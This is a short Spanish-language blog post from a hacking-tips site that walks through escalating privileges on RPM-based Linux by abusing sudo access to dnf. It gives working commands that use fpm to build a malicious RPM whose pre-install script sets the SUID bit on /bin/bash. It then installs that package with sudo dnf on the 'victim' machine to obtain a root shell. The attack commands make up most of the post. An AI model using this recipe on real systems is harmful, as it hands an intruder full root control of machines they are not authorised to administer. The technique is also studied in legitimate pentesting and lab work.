Curiosidades De Hackers
ESCALADA DE PRIVILEGIOS LINUXLINUX

Escalada de Privilegios DNF


Esta forma de escalar se da en distribuciones de Linux basadas en RPM como fedora:

Desde la máquina atacante generamos un archivo .rpm malicioso que contiene el comando chmod u+s /bin/bash:

TF=$(mktemp -d)
echo 'chmod u+s /bin/bash' > $TF/x.sh
fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF

Lo compartimos con la máquina víctima:

Desde la máquina víctima ejecutamos el siguiente comando:

sudo /usr/bin/dnf install -y virus.rpm

Y ahora ya se habrá ejecutado el comando chmod u+s /bin/bash y podremos escalar a root:


Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *